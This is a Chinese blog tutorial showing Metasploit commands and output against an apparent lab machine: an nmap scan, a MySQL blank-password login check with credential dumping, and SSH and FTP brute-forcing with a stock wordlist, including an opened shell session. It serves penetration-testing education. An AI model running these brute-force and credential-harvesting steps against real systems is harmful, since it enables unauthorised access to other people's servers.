Metasploit攻击实例(四)

2022年10月25日10:27:05 发表评论 154 views

1.1 Metasploit攻击实例

Metasploit攻击实例(四)

1.1.1 攻击空密码的mysql服务

1.1.1.1 扫描主机并导入metasploit

# nmap -A -T4 -v 192.168.1.120 -oX /tmp/192.168.1.120.xml
msf6 > db_import /tmp/192.168.1.120.xml
msf6 > hosts -R 192.168.1.120

Metasploit攻击实例(四)
msf6 > services -R 192.168.1.120

Metasploit攻击实例(四)

1.1.1.2 验证主机是否存在mysql空密码漏洞

msf6 > search mysql type:auxiliary

Metasploit攻击实例(四)
msf6 > use auxiliary/scanner/mysql/mysql_login
msf6 auxiliary(scanner/mysql/mysql_login) > show options

Metasploit攻击实例(四)
msf6 auxiliary(scanner/mysql/mysql_login) > set USERNAME root
USERNAME => root
msf6 auxiliary(scanner/mysql/mysql_login) > set BLANK_PASSWORDS true
BLANK_PASSWORDS => true
msf6 auxiliary(scanner/mysql/mysql_login) > set RHOSTS 192.168.1.120
RHOSTS => 192.168.1.120
msf6 auxiliary(scanner/mysql/mysql_login) > run

Metasploit攻击实例(四)

1.1.1.3 获取数据库中所有凭证

msf6 auxiliary(scanner/mysql/mysql_login) > creds

Metasploit攻击实例(四)

1.1.1.4 导出扫描结果给其他metasploit使用

msf6 auxiliary(scanner/mysql/mysql_login) > db_export -f xml /tmp/192.168.1.120-mysql.xml
[*] Starting export of workspace default to /tmp/192.168.1.120-mysql.xml [ xml ]...
[*] Finished export of workspace default to /tmp/192.168.1.120-mysql.xml [ xml ]...

1.1.2 暴力破解SSH

1.1.2.1 对ssh进行暴力破解

msf6 > search ssh_login

Metasploit攻击实例(四)
msf6 > use 0
msf6 auxiliary(scanner/ssh/ssh_login) > show options

Metasploit攻击实例(四)
msf6 auxiliary(scanner/ssh/ssh_login) > set RHOSTS 192.168.1.120
RHOSTS => 192.168.1.120
msf6 auxiliary(scanner/ssh/ssh_login) > set USERPASS_FILE /usr/share/metasploit-framework/data/wordlists/root_userpass.txt
USERPASS_FILE => /usr/share/metasploit-framework/data/wordlists/root_userpass.txt
msf6 auxiliary(scanner/ssh/ssh_login) > set STOP_ON_SUCCESS true
STOP_ON_SUCCESS => true
msf6 auxiliary(scanner/ssh/ssh_login) > exploit

Metasploit攻击实例(四)

1.1.2.2 破解后进行验证

msf6 auxiliary(scanner/ssh/ssh_login) > sessions

Metasploit攻击实例(四)
msf6 auxiliary(scanner/ssh/ssh_login) > sessions -i 8
[*] Starting interaction with 8...

whoami
msfadmin
ls
vulnerable
background

Background session 9? [y/N]  y

1.1.3 暴力破解FTP

1.1.3.1 对ftp进行暴力破解

msf6 > search ftp_login

Metasploit攻击实例(四)
msf6 > use 0
msf6 auxiliary(scanner/ftp/ftp_login) > show options

Metasploit攻击实例(四)
msf6 auxiliary(scanner/ftp/ftp_login) > set RHOSTS 192.168.1.120
RHOSTS => 192.168.1.120
msf6 auxiliary(scanner/ftp/ftp_login) > set USERPASS_FILE /usr/share/metasploit-framework/data/wordlists/root_userpass.txt
USERPASS_FILE => /usr/share/metasploit-framework/data/wordlists/root_userpass.txt
msf6 auxiliary(scanner/ftp/ftp_login) > set STOP_ON_SUCCESS true
STOP_ON_SUCCESS => true
msf6 auxiliary(scanner/ftp/ftp_login) > exploit

Metasploit攻击实例(四)

weinxin
我的微信
如果有技术上的问题可以扫一扫我的微信
版权声明
1. 本网站名称:Leon的博客
2. 本站永久网址:https://blog.leonshadow.cn
3. 本网站的文章部分内容可能来源于网络,仅供大家学习与参考,如有侵权,请联系站长QQ632113590进行删除处理。
4. 本站一切资源不代表本站立场,并不代表本站赞同其观点和对其真实性负责。
5. 本站一律禁止以任何方式发布或转载任何违法的相关信息,访客发现请向站长举报
6. 本站资源大多存储在云盘,如发现链接失效,请联系我们我们会第一时间更新。
liyang